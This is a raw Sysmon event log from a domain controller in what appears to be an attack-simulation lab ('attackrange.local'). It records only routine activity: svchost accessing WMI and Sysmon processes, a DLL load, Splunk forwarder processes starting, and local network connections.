12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:04.233{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 734700x80000000000000008650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.855{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000008649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.870{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.731{266CAFBE-64F9-6064-0B01-00000000AE01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000008641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.585{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53602-false10.0.1.12-8000- 354300x80000000000000008640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:04.185{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53601-false10.0.1.12-8000- 354300x80000000000000008639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:03.813{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53600-false10.0.1.12-8000- 23542300x80000000000000008638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.558{266CAFBE-646C-6064-1300-00000000AE01}1228NT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\System32\LogFiles\WMI\SUM.etlMD5=6E670A5B35EE5D8F2D7319388377E251,SHA256=80596A4ABC86218D1BF43A2006230CF12DE395AD29645499B24BA6F5E1A4A02D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.527{266CAFBE-64F7-6064-0801-00000000AE01}42805468C:\Windows\system32\sppsvc.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+7ec28|C:\Windows\system32\sppsvc.exe+749f0|C:\Windows\system32\sppsvc.exe+95a0e|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+78e23|C:\Windows\system32\RPCRT4.dll+d96bd|C:\Windows\system32\RPCRT4.dll+6194c|C:\Windows\system32\RPCRT4.dll+52bf4|C:\Windows\system32\RPCRT4.dll+51b0d|C:\Windows\system32\RPCRT4.dll+523bb|C:\Windows\system32\RPCRT4.dll+2469c|C:\Windows\system32\RPCRT4.dll+24b1c|C:\Windows\system32\RPCRT4.dll+111bc|C:\Windows\system32\RPCRT4.dll+12a1b|C:\Windows\system32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x80000000000000008636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.527{266CAFBE-64F7-6064-0801-00000000AE01}42805468C:\Windows\system32\sppsvc.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+74b0a|C:\Windows\system32\sppsvc.exe+959c1|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+78e23|C:\Windows\system32\RPCRT4.dll+d96bd|C:\Windows\system32\RPCRT4.dll+6194c|C:\Windows\system32\RPCRT4.dll+52bf4|C:\Windows\system32\RPCRT4.dll+51b0d|C:\Windows\system32\RPCRT4.dll+523bb|C:\Windows\system32\RPCRT4.dll+2469c|C:\Windows\system32\RPCRT4.dll+24b1c|C:\Windows\system32\RPCRT4.dll+111bc|C:\Windows\system32\RPCRT4.dll+12a1b|C:\Windows\system32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.465{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:05.449{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 